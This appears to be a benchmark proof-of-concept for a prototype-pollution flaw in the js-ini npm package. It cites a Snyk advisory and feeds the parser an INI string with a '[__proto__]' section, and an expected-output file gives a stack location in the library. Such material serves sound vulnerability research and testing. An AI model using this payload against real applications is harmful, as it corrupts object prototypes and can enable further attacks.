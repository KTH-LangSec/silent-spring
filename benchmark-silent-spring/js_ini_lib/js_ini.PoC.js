//https://snyk.io/vuln/SNYK-JS-JSINI-1048970
var ini = require('js-ini')
const payload = '[__proto__]\npolluted = yes';
var parsed = ini.parse(payload);
  