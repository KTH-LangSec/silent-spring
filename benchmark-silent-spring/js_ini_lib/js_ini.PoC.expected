node_modules/js-ini/lib/parse.js:51:17